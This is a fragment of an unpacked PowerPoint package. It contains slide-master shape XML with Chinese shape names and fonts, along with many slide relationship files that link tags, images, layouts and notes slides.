          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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E9772059-CF1C-459A-BD31-B6DE25563939}"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776" r:id="rId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2"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4"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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="6487795"/>
            <a:ext cx="12192000" cy="370205"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="6572250"/>
            <a:ext cx="12192000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A728BE"/>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ea typeface="阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图形 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId6"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="200184" y="180670"/>
            <a:ext cx="756000" cy="756000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="6348182" y="-4812103"/>
            <a:ext cx="0" cy="11520000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="A728BE"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="A728BE">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="灯片编号占位符 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11347200" y="6076800"/>
            <a:ext cx="828000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId9"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483666" r:id="rId1"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="1"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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag305.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag303.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.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46.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag357.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag356.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag355.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag354.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag353.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout47.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag362.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag361.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag360.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag359.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag358.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout48.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag367.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag366.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag365.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag364.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag363.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout49.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag372.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag371.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag370.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag369.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag368.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout50.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag376.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag375.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag373.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag382.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag381.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag380.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag379.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag378.xml"/></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52.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag383.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.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53.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag387.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag386.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag385.xml"/></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54.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag390.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag389.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag388.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag392.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag391.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag312.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag311.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag309.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout56.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag400.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag399.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag398.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag402.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag401.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout58.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag410.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag409.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag408.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag407.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag406.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag412.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag411.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag420.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag419.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag418.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag417.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag416.xml"/></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22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag422.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag421.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag428.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag427.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.xml"/></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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout65.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout63.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29.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slideLayout" Target="../slideLayouts/slideLayout64.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag435.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag325.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag324.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag323.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag322.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag320.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag319.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" 